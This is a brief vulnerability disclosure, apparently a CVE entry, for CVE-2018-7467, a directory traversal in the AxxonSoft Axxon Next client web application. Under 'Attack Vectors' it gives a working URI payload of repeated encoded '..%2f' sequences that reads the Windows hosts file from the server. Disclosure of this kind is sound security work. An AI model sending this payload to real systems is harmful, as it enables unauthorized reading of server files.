AxxonSoft Axxon Next – AxxonSoft Client Directory Traversal via an initial /css//..%2f substring in a URI. CVE-2018-7467

Project X Lead Penetration tester Anthony Cicalla has discovered the listed vulnerability with AxxonSoft Client Directory Traversal.

AxxonSoft Axxon Next – AxxonSoft Client Directory Traversal via an initial /css//..%2f substring in a URI. CVE-2018-7467

[Vulnerability Type]

Directory Traversal via an initial /css//..%2f substring in a URI

[Vendor of Product]

AxxonSoft Client

[Affected Product Code Base]

Axxon Next

[Affected Component]

AxxonSoft Client Web Application's Source Code

[Attack Type]

Remote

[Impact Information Disclosure]

true

[Attack Vectors]

It is a Directory Traversal 

 /css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\System32\drivers\etc\hosts

 

Leon Rogers